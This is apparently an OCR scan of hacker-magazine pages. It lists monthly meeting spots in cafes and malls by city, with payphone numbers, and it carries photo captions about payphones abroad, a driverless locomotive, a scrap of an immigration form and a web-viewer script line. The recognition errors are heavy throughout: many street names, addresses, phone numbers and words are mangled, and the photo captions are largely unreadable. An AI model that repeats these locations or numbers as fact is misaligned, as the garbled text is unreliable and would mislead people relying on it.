Conti SWEDEN Street' pm. Gothenburg: Outstde Vanilj. 6 pm. Elaine Stockholm: Outside Lava. Portland: Maine Mall by the bench at the SWITZERLAND court door' lausanne: I n front of the Mac00 beslde Ua$anlns the tram station. Baltimore: Barnes 8 Noble cafe at the UNITED STATES Inner Harbor. Alabama Massachusetts Auburn: The student lounge uprtairr i n Boston: PrudenbalCenter Plaza, tenace the Foy Union Bu~lding.7 pm. food court at the tables near the windows. Huntrville: square the Marlborough: Solomon Park Mall food food court near McDonaldp. Tuscaloosa: ~ r h r l a n d food court M~II Northamptan: Javanet Cafe across from near the front entrance. Polaski Park. Arizona Michigan Phoenix: Borders. 2nd Floor Cafe Area. Ann Arbor: The Galleria on South 2402 E Camelback Road. . Uniwrsity. Tucson: Borders i n the Park Mall. 7 pm. California Minnesota Bbomington: Mall of America, north ride L~~ Angeler: f,, Union Stahon, corner food court, across from Burger King & the Alameda, Indde main entrance by Macy bank of phones. Pqyphoner: (213) 972-9519, bank lrf payphonesthat don't take 9520: 625-9923.9924: 613-9704. 9746. "mingca'k' i Missouri Manterey: Morgan's Coffee & Tea. 498 Kansas City (Independence): Barnes 8 Washington St. Orange Couno/ (lake Forest): ~iedrich Noble. *91M East 39th St ~ oD",,~. ~ 8pm. ~ St. Louis (Maryland Heights): Rivah ~ t coffee, 22621 Sacramento: camille'r at the corner d Technology Cafe. 11502 6 pm. Springfield: Borders Booksand Music rofSunnre and Madaon. sari biego: R~~~~~~ ~ i 4150~ uegentr , feeshop. 3300 South Glenstone Ave, one ~ Park Row #170. block south of Battlefield Mall. 5:30 Dm. Nebraska San Francisco: 4 Embarcadero PLaza (inOmaha: Crnrrroadr Mall Food Court. 7 pm. ride). payphone$:(415) 398-9803.9804, 9805.9806. Nevada San Jose: Outride the cafe at the MLK ~i. h s VLgsr Palms (asino food court. 8 pm. N Mexico m brary at 4th and E. San Fernando. 6 pm. Santa Barbara: cafe Mena on State street. Albuquerque: Winrock Mall food coort, near payphones on the lower level between Colorado the fountain 8 arcade. Payphone: ($05) Boulder: Wing Zone food court, 13th and Collqe. 6 pm. 883-9985.9976.9841. New York Denver: Borders Cafe, Parker and Arapahoe. New Yo* Citigroup Center, in the lobby, District of Columbia near the payphoner. 153 E 53rd St.. Arlington: Pentagon City Mall in the food between Lexington 8 3rd. court. 6 pm.

North Dakota 'Far&-: West Aoei Mall food court by the Taco 3ohn'r. Ohio Akron: Aiabica on W Market Street. interrertian of Hawkinr. W Market, and . Exchanqe. Cleveland: Uniwrrity Circle Arabica. 11300 Juniper Rd. Upstairs. turn right, second room on left. Dayton: At the Marions behind the Dayton Mall. Oklahoma Oklahoma City: Cafe Bella. southeast
corner of S 89th Street and Penn. W

Tulsa: Java Dave's Coffee Shop on 81rt and Harvard. Oregon Portland: Backspace Cafe. 115 N 5th Ave. W 6pm. Pennsylvania Alttntown: Paocra Bread. 3100 West Tilghman Street. 6 pm. Philadelphia: 30th Street Ration, under Stalrwell7 agn. Fittsburgh: William Fitt Union building an the University of Rteburgh campus by the Bigelow Boulevard entrance. South Caroltna Charleston: Northwoods Mallln the hall between Sean and Chik-Fil-A. South Dakota Sioux F a \ k Emp~re Mall, by Bu~ger King. Tennessee Knoxville: Borderr Bookr Cafe across from Weltown Mall. Memphis (Cordova): San Francisco Bread Company. 990 N. Germantown Parkway. 6 pm. Nashville: 3-J's Market. 1912 Broadway. Texas Austin: oobie Mall food court. 6 pm. Dallas: Mama's Pizza. Campbell 8 Preston. 7 pm. Houston: Ninfa'r Express in front of Nordrtrom'r i n the Galleria MalL San Antonio: North Star Mall food court. Utah Salt Lake City: ZCMI Mallin The Park Food Court. Vermont Burlington: Borders Books at Church St. and Cherry St. on the second floor ofthe cafe. Virginia Arlington: (nee Oirtrict of Columbia) Virginia Beach: Lynnhaven Mall on Lynnhaven Parkway. 6 pm. Washington Seattle: Washington State Convention Center 6 pm. Wisconsin Madison: Union South (227 Y. Randall Ave.) on the lower level in the Copper Hearth Lounge. MIIwaukee: The Node. 1504 E. North Ave. All meetings take place on the first Friday of the month. Unlerr otherwire noted, they start at 5 pm local time.
To rtarta meeting in your city, leave a mes-


rage 8 phone number at (631) 751-2600 or rend emarl to meetings@Z600.com.


Pay~hones the of


Sarnarkand, Uzbekistan. Coins o i ~ l yh u t w h a t
a i n l a g n i f i c e n t h a n d s e t . A i i d j ~ i i iLoolc h o w t h e y ' v e r e c o n f ~ g u r e d h e t o u c h tot-I? p a t i ! t


Mumbai, India. A co111c r i j ~ ~ a i epi lil o n t .
Taj Malial H o i < ~ l .



Anuradhapura, Sri Lanka. W e ' v ~ i e ~ r it h e d c t u a l p h o n e ~n a p r e v l o u s issue b u t t h ~ s r u ~ a Lp h o n e b o o t h IS a s t r ~ k ~ i s y y h t l~
Photo by Toin Mele

Firenze, Italy. A 511 1 1 t3 d q e p h o n e t h a ~ u o l . ~ as fit's ah0111 t o l ~ i l i , l w l t h ~ n t h ~ ~ s r a s r n


Photo by L o r e t t e Mas

is page can now be found CM

This has to be about the worst idea ever concocted. We've heard of driverless light rail systems in the confines of an airport but huge steel freight train locomotives on an easily accessible track? Technology marches on. Found in Roseville, CA.
Photo by Adrian Lamo
Alien's Change of I (Middle)

Ireau of Citizenship and lmmigratlon AME (Last in CAPS) (First)






. ..-,ident -e lr h ....,... (Speclb V m~NUMBER FROM ALIEN CARD
(State) (ZIP Code

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->